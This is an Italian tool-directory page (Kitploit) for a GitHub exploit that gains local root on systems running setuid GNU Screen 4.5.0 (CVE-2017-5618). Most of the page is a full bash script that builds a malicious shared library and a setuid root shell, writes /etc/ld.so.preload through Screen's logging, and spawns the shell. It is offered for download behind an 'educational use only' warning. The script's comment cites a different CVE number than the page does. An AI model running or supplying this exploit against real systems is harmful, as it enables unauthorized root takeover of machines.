Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2017-5618-Screen-4.5.0-Root — Exploit di escalation dei privilegi locale per GNU Screen 4.5.0 (CVE-2017-5618). Sfrutta una vulnerabilità nella funzionalità di logging per dirottare il caricamento delle librerie condivise e ottenere accesso root tramite manipolazione di ld.so.preload. Vulnerabile: Screen 4.5.0 (SUID) Corretto in: Screen 4.6.0+ | Kitploit
Strumenti/GitHubGitHub/rxdarkee/cve-2017-5618-screen-4.5.0-root
Escalation di PrivilegiExploitPenetration TestingApprendimento e FormazioneBinary ExploitationLab e Pratica
GitHubrxdarkee/cve-2017-5618-screen-4.5.0-root

CVE-2017-5618-Screen-4.5.0-Root

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Exploit di escalation dei privilegi locale per GNU Screen 4.5.0 (CVE-2017-5618). Sfrutta una vulnerabilità nella funzionalità di logging per dirottare il caricamento delle librerie condivise e ottenere accesso root tramite manipolazione di ld.so.preload. Vulnerabile: Screen 4.5.0 (SUID) Corretto in: Screen 4.6.0+

3211 mesi faNon ancora revisionato
Condividi

GNU Screen 4.5.0 - Exploit di escalation dei privilegi locali (CVE-2017-5618)

📌 Panoramica

Exploit di escalation dei privilegi locali per GNU Screen 4.5.0 che dirotta il caricamento delle librerie condivise per ottenere accesso root tramite manipolazione di ld.so.preload.

🔧 Dettagli tecnici

Vulnerabilità: CVE-2017-5618

Tipo: Dirottamento di librerie condivise tramite ld.so.preload

Interessati: esclusivamente GNU Screen 4.5.0

Corretto in: GNU Screen 4.6.0+

🎪 Il Circo della Vulnerabilità

CVE: 2017-5618 🎯

Il Bug: Screen 4.5.0 crea file di log con permessi PERICOLOSI

La Magia: Lo inganniamo per fargli creare /etc/ld.so.preload che carica la nostra libreria dannosa

Il Payload: Shell root immediata! 🐚

Script 🗒️

root@kitploit:~
#!/bin/bash
# exploit.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# CVE-2016-8781
# tested on debian jessie (8.6) with screen 4.5.
# 0xHackers - Darke
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" 
echo "[+] Triggering..."
screen -ls 
/tmp/rootshell
            

Screenshot

Verifica della versione di Screen vulnerabile.

Screen version detected

Creazione del file e assegnazione dei permessi richiesti.

Making

Accesso root ottenuto.

Root

Shell root ottenuta - controllo completo del sistema

⚠️ Etichetta di avvertimento

SOLO PER USO EDUCATIVO! ⚠️ Non fare lo script kiddie - usalo solo su sistemi di tua proprietà o su cui hai esplicita autorizzazione a testare.

Testato su

TryHackMe KOTH Room - Food

Scarica lo strumento